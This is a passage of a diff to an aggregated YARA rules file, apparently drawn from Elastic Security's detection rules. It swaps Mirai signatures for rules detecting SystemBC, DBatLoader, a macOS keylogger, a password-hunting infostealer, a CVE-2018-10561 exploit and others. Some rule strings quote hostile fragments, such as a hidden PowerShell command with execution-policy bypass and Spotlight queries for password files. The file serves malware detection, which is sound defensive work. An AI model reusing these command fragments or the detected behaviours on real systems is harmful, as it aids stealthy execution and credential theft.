"37ab5e3ccc9a91c885bff2b1b612efbde06999e83ff5c5cd330bd3a709a831f5" + fingerprint = "c4c33125a1fad9ff393138b333a8cebfd67217e90780c45f73f660ed1fd02753" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78624,141 +79001,159 @@ rule ELASTIC_Linux_Trojan_Mirai_Ab073861 : FILE MEMORY os = "linux" strings: - $a = { AC 00 00 00 54 60 00 00 50 E8 4E 0C 00 00 EB 0E 5A 58 59 97 60 8A 54 } + $a = { 6C 77 61 79 73 22 2C 20 22 6E 6F 5F 6D 6C 63 6B 22 2C 20 22 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_637F2C04 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Dinvokerust_512D3B59 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Hacktool Dinvokerust (Windows.Hacktool.DinvokeRust)" author = "Elastic Security" - id = "637f2c04-98e4-45aa-b60a-14a96c6cebb7" - date = "2021-01-12" - modified = "2021-09-16" + id = "512d3b59-6bd3-4716-aa5f-1541044bbf9a" + date = "2024-02-28" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L970-L987" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "cff4aa6c613ccc64f64441f7e40f79d3a22b5c12856c32814545bd41d5f112bd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_DinvokeRust.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ebf0f1bfd166d2d49b642fa43cb0c7364c0c605d9a7f108dc49d9f1cc859ab4a" + logic_hash = "7be1a4e25cf41e47ab135c718b7ec5a49a2890cf873c52597f8dab4d47636ed8" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c" + fingerprint = "0587368dc33b7fee0037be9247daaeaf6846c2b4a839660511ebf5eb0fdfb087" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 10 48 8B 45 E0 0F B6 00 38 C2 0F 95 C0 48 FF 45 E8 48 FF 45 E0 } + $s1 = { 64 69 6E 76 6F 6B 65 ?? ?? 67 65 74 5F } + $s2 = { 64 69 6E 76 6F 6B 65 ?? ?? 6E 74 5F } + $s3 = { 64 69 6E 76 6F 6B 65 ?? ?? 6C 69 74 63 72 79 70 74 } + $s4 = { 64 69 6E 76 6F 6B 65 5C 73 72 63 5C 6C 69 62 2E 72 73 } + $s5 = { 75 6E 77 69 6E 64 65 72 ?? ?? 63 61 6C 6C 5F 66 75 6E 63 74 69 6F 6E } + $s6 = { 75 6E 77 69 6E 64 65 72 ?? ?? 69 6E 64 69 72 65 63 74 5F 73 79 73 63 61 6C 6C } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Mirai_Aa39Fb02 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Dbatloader_F93A8E90 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Dbatloader (Windows.Trojan.DBatLoader)" author = "Elastic Security" - id = "aa39fb02-ca7e-4809-ab5d-00e92763f7ec" - date = "2021-01-12" - modified = "2021-09-16" + id = "f93a8e90-10ac-44de-ac3b-c0e976628e98" + date = "2022-03-11" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L989-L1006" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "ffa95d92a2b619008bd5918cd34a17cd034b2830dc09d495db4b0c397b1cb53a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_DBatLoader.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f72d7e445702bbf6b762ebb19d521452b9c76953d93b4d691e0e3e508790256e" + logic_hash = "6fe91d91bb383c66a6dc623b02817411a39b88030142517f4048c5c25fbb4ac5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb" + fingerprint = "81b87663fbad9854430e5c4dcade464a15b995e645f9993a3e234593ee4df901" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 74 DE 8D 40 F1 3C 01 76 D7 80 FA 38 74 D2 80 FA 0A 74 CD 80 } + $a = { FF 00 74 17 8B 45 E8 0F B6 7C 18 FF 66 03 7D EC 66 0F AF 7D F4 66 03 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_0Bce98A2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Systembc_5E883723 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Systembc (Windows.Trojan.SystemBC)" author = "Elastic Security" - id = "0bce98a2-113e-41e1-95c9-9e1852b26142" - date = "2021-01-12" - modified = "2021-09-16" + id = "5e883723-7eaa-4992-91de-abb0ffbba54e" + date = "2022-03-22" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1008-L1026" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80" - logic_hash = "04d10ef03c178fb101d3c6b6d3b36f0aa04149b9b35a33c3d10d17af1fc07625" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SystemBC.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b432805eb6b2b58dd957481aa8a973be58915c26c04630ce395753c6a5196b14" + logic_hash = "fde2e0b5debd4d26838fb245fdf8e5103ab5aab9feff900cbba00c1950adc61a" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e" + fingerprint = "add95c1f4bb279c8b189c3d64a0c2602c73363ebfad56a4077119af148dd2d87" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A } + $a1 = "GET /tor/rendezvous2/%s HTTP/1.0" ascii fullword + $a2 = "https://api.ipify.org/" ascii fullword + $a3 = "KEY-----" ascii fullword + $a4 = "Host: %s" ascii fullword + $a5 = "BEGINDATA" ascii fullword + $a6 = "-WindowStyle Hidden -ep bypass -file \"" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_3A56423B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Systembc_C1B58C2F : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Systembc (Windows.Trojan.SystemBC)" author = "Elastic Security" - id = "3a56423b-c0cf-4483-87e3-552beb40563a" - date = "2021-01-12" - modified = "2021-09-16" + id = "c1b58c2f-8bbf-4c03-9f53-13ab2fb081cc" + date = "2024-05-02" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1028-L1045" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "0c2765a5c1b331eb9ff5e542bc72eff7be3506e6caef94128413d500086715c6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SystemBC.yar#L26-L49" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "016fc1db90d9d18fe25ed380606346ef12b886e1db0d80fe58c22da23f6d677d" + logic_hash = "16ed14dac0c30500c5e91759b0a1b321f3bd53ae6aab1389a685582eba72c222" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75" + fingerprint = "dfbf98554e7fb8660e4eebd6ad2fadc394fc2a4168050390370ec358f6af1c1d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 24 1C 8B 44 24 20 0F B6 D0 C1 E8 08 89 54 24 24 89 44 24 20 BA 01 00 } + $a1 = "GET %s HTTP/1.0" ascii fullword + $a2 = "HOST1:" + $a3 = "PORT1:" + $a4 = "-WindowStyle Hidden -ep bypass -file \"" ascii fullword + $a5 = "BEGINDATA" ascii fullword + $a6 = "socks32.dll" ascii fullword condition: - all of them + 5 of them } -rule ELASTIC_Linux_Trojan_Mirai_D18B3463 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Prochide_7333221A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Hacktool Prochide (Linux.Hacktool.Prochide)" author = "Elastic Security" - id = "d18b3463-1b5e-49e1-9ae8-1d63a10a1ccc" - date = "2021-01-12" + id = "7333221a-b3dc-4b26-8ec7-7e4f5405e228" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1047-L1065" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cd86534d709877ec737ceb016b2a5889d2e3562ffa45a278bc615838c2e9ebc3" - logic_hash = "f906c6f9baae6d6fa3f42e84607549bae44ed9ca847fd916d04f2671eef1caa1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Prochide.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fad956a6a38abac8a8a0f14cc50f473ec6fc1c9fd204e235b89523183931090b" + logic_hash = "413f19744240eae0a87d56da1e524e2afa0fe0ec385bd9369218713b13a93495" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4b3d3bb65db2cdb768d91c50928081780f206208e952c74f191d8bc481ce19c6" + fingerprint = "e3aa99d48a8554dfaf9f7d947170e6e169b99bf5b6347d4832181e80cc2845cf" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78766,55 +79161,61 @@ rule ELASTIC_Linux_Trojan_Mirai_D18B3463 : FILE MEMORY os = "linux" strings: - $a = { DF 77 95 8D 42 FA 3C 01 76 8E 80 FA 0B 74 89 80 FA 15 74 84 80 } + $a = { FF FF 83 BD 9C FC FF FF FF 75 14 BF 7F 22 40 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Fe721Dc5 : FILE MEMORY +rule ELASTIC_Macos_Backdoor_Keyboardrecord_832F7Bac : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Backdoor Keyboardrecord (MacOS.Backdoor.Keyboardrecord)" author = "Elastic Security" - id = "fe721dc5-c2bc-4fa6-bdbc-589c6e033e6b" - date = "2021-01-12" - modified = "2021-09-16" + id = "832f7bac-3896-4934-b05f-8215a41cca74" + date = "2021-11-11" + modified = "2022-07-22" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1067-L1084" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "e9312eefb5f14a27d96e973139e45098c2f62a24d5254ca24dea64b9888a4448" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Backdoor_Keyboardrecord.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "570cd76bf49cf52e0cb347a68bdcf0590b2eaece134e1b1eba7e8d66261bdbe6" + logic_hash = "5719681d50134edacb5341034314c33ed27e9325de0ae26b2a01d350429c533b" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "ab7f571a3a3f6b50b9e120612b3cc34d654fc824429a2971054ca0d078ecb983" + tags = "FILE" + fingerprint = "27aa4380bda0335c672e957ba2ce6fd1f42ccf0acd2eff757e30210c3b4fb2fa" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 89 18 EB E1 57 83 EC 08 8B 7C 24 10 8B 4C 24 14 8B 54 24 18 53 } + $s1 = "com.ccc.keyboardrecord" + $s2 = "com.ccc.write_queue" + $s3 = "ps -p %s > /dev/null" + $s4 = "useage %s path useragentpid" + $s5 = "keyboardRecorderStartPKc" condition: - all of them + 3 of them } -rule ELASTIC_Linux_Trojan_Mirai_575F5Bc8 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2018_10561_0F246E33 : FILE MEMORY CVE_2018_10561 { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Exploit Cve 2018 10561 (Linux.Exploit.CVE-2018-10561)" author = "Elastic Security" - id = "575f5bc8-b848-4db4-a99c-132d4d2bc8a4" + id = "0f246e33-0e98-4778-8a2f-14876d1a0efe" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1086-L1103" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "dec143d096f5774f297ce90ef664ae50c40ae4f87843bbb34e496565c0faf3b2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2018_10561.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "eac08c105495e6fadd8651d2e9e650b6feba601ec78f537b17fb0e73f2973a1c" + logic_hash = "2c3785ddfded7128e983f3ec17a9f77c856d903f07e325b08f9f463950576ebe" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "58e22a2acd002b07e1b1c546e8dfe9885d5dfd2092d4044630064078038e314f" + tags = "FILE, MEMORY, CVE-2018-10561" + fingerprint = "718b66d3d65d31f0908c8f7d7aee8113e9b51cb576cd725bbca1a23d3ccd4d72" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78822,345 +79223,355 @@ rule ELASTIC_Linux_Trojan_Mirai_575F5Bc8 : FILE MEMORY os = "linux" strings: - $a = { 5A 56 5B 5B 55 42 44 5E 59 52 44 44 00 5E 73 5E 45 52 54 43 00 } + $a = { 0B DF 0B 75 87 8C 5C 03 03 7A 4B 7A 95 4A A5 D2 13 6A 6A 5A 5A } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_449937Aa : FILE MEMORY +rule ELASTIC_Macos_Infostealer_Mdquerypassw_6125F987 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Infostealer Mdquerypassw (MacOS.Infostealer.MdQueryPassw)" author = "Elastic Security" - id = "449937aa-682a-4906-89ab-80d7127e461e" - date = "2021-01-12" - modified = "2021-09-16" + id = "6125f987-b5a4-4999-ab39-ff312a43f6d9" + date = "2023-04-11" + modified = "2024-08-19" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1105-L1123" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6f27766534445cffb097c7c52db1fca53b2210c1b10b75594f77c34dc8b994fe" - logic_hash = "d459e46893115dbdef46bcaceb6a66255ef3a389f1bf7173b0e0bd0d8ce024fb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Infostealer_MdQueryPassw.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "72e0c1a7507733157f93e2bff82e6ec10d50986020eeeb27a02aba5cd8c78a81" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "cf2c6b86830099f039b41aeaafbffedfb8294a1124c499e99a11f48a06cd1dfd" + fingerprint = "744e5e82bd90dc75031c2ce8208e9b8d10f062a57666f7e7be9428321f2929cc" severity = 100 - arch_context = "x86" + arch_context = "x86, arm64" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 00 00 5B 72 65 73 6F 6C 76 5D 20 46 6F 75 6E 64 20 49 50 20 } + $string1 = /kMDItemTextContent\s{1,50}==\s{1,50}\S{1,50}passw/ ascii wide nocase + $string2 = /kMDItemDisplayName\s{1,50}==\s{1,50}\S{1,50}passw\S{1,50}/ ascii wide nocase condition: - all of them + any of ($string1,$string2) } -rule ELASTIC_Linux_Trojan_Mirai_2E3F67A9 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Tmcomm_333F3851 : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Name: TmComm.sys, Version: 8.0.0.0" author = "Elastic Security" - id = "2e3f67a9-6fd5-4457-a626-3a9015bdb401" - date = "2021-01-12" - modified = "2021-09-16" + id = "333f3851-5d99-4b22-8af5-1587e9e44ea4" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1125-L1143" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" - logic_hash = "8c83c5d32c58041444f33264f692a7580c76324d2cbad736fdd737bdfcd63595" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_TmComm.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64" + logic_hash = "a4464fb7edbacb6d9c8d6b385f9cc28685f0bed40876eecd5a7c87e0707e3025" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "6a06815f3d2e5f1a7a67f4264953dbb2e9d14e5f3486b178da845eab5b922d4f" - severity = 100 + tags = "FILE" + fingerprint = "94b718e4450f28b8a9562f89a2fd0e395012051f0af8617d8ab13a45afcd4191" + threat_name = "Windows.VulnDriver.TmComm" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 53 83 EC 04 0F B6 74 24 14 8B 5C 24 18 8B 7C 24 20 0F B6 44 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 54 00 6D 00 43 00 6F 00 6D 00 6D 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x08][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x07][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Mirai_01E4A728 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Genieo_5E0F8980 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" author = "Elastic Security" - id = "01e4a728-7c1c-479b-aed0-cb76d64dbb02" - date = "2021-01-12" - modified = "2021-09-16" + id = "5e0f8980-1789-4763-9e41-a521bdb3ff34" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1145-L1162" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "753936b97a36c774975a1d0988f6f908d4b5e5906498aa34c606d4cd971f1ba5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Genieo.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6c698bac178892dfe03624905256a7d9abe468121163d7507cade48cf2131170" + logic_hash = "76b725f6ae5755bb00d384ef2ae1511789487257d8bb7cb61b893226f03a803e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196" + fingerprint = "f0b5198ce85d19889052a7e33fb7cf32a7725c4fdb384ffa7d60d209a7157092" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 44 24 23 48 8B 6C 24 28 83 F9 01 4A 8D 14 20 0F B6 02 88 45 08 } + $a = { 00 CD 01 1E 68 57 58 D7 56 7C 62 C9 27 3C C6 15 A9 3D 01 02 2F E1 69 B5 4A 11 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_64D5Cde2 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Genieo_37878473 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" author = "Elastic Security" - id = "64d5cde2-e4b1-425b-8af3-314a5bf519a9" - date = "2021-01-12" - modified = "2021-09-16" + id = "37878473-b6f8-4cbe-ba70-31ecddf41c82" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1164-L1182" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "caf2a8c199156db2f39dbb0a303db56040f615c4410e074ef56be2662752ca9d" - logic_hash = "08f3635e5517185cae936b39f503bbeba5aed2e36abdd805170a259bc5e3644f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Genieo.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0fadd926f8d763f7f15e64f857e77f44a492dcf5dc82ae965d3ddf80cd9c7a0d" + logic_hash = "bb04ae4e0a98e0dbd0c0708d5e767306e38edf76de2671523f4bd43cbcbfefc2" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "1a69f91b096816973ce0c2e775bcf2a54734fa8fbbe6ea1ffcf634ce2be41767" + fingerprint = "e9760bda6da453f75e543c919c260a4560989f62f3332f28296283d4c01b62a2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 0F 35 7E B3 02 00 D0 02 00 00 07 01 00 00 0E 00 00 00 18 03 00 } + $a = { 65 72 6E 61 6C 44 6F 77 6E 4C 6F 61 64 55 72 6C 46 6F 72 42 72 61 6E 64 3A 5D } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_0D73971C : FILE MEMORY +rule ELASTIC_Macos_Trojan_Genieo_0D003634 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" author = "Elastic Security" - id = "0d73971c-4253-4e7d-b1e1-20b031197f9e" - date = "2021-01-12" - modified = "2021-09-16" + id = "0d003634-8b17-4e26-b4a2-4bfce2e64dde" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1184-L1202" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead" - logic_hash = "56f3bac05fce0a0458e5b80197335e7bef6dcd50b9feb6f1008b8679f29cf37a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Genieo.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bcd391b58338efec4769e876bd510d0c4b156a7830bab56c3b56585974435d70" + logic_hash = "0412f88408fb14d1126ef091d0a5cc0ee2b2e39aeb241bef55208b59830ca993" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "95279bc45936ca867efb30040354c8ff81de31dccda051cfd40b4fb268c228c5" + fingerprint = "6f38b7fc403184482449957aff51d54ac9ea431190c6f42c7a5420efbfdb8f7d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 89 C2 83 EB 04 C1 E2 0B 31 C2 89 F0 C1 E8 13 89 D1 31 F0 C1 } + $a = { 75 69 6C 64 2F 41 6E 61 62 65 6C 50 61 63 6B 61 67 65 2F 62 75 69 6C 64 2F 73 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_82C361D4 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Genieo_9E178C0B : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Macos Trojan Genieo (MacOS.Trojan.Genieo)" author = "Elastic Security" - id = "82c361d4-2adf-48f2-a9be-677676d7451f" - date = "2021-01-12" - modified = "2021-09-16" + id = "9e178c0b-02ca-499b-93d1-2b6951d41435" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1204-L1222" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f8dbcf0fc52f0c717c8680cb5171a8c6c395f14fd40a2af75efc9ba5684a5b49" - logic_hash = "766a964d7d35525fbc88adcf86fb69d11f9c63c0d28ceefb3ae79797a7161193" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Genieo.yar#L61-L79" + license_url = 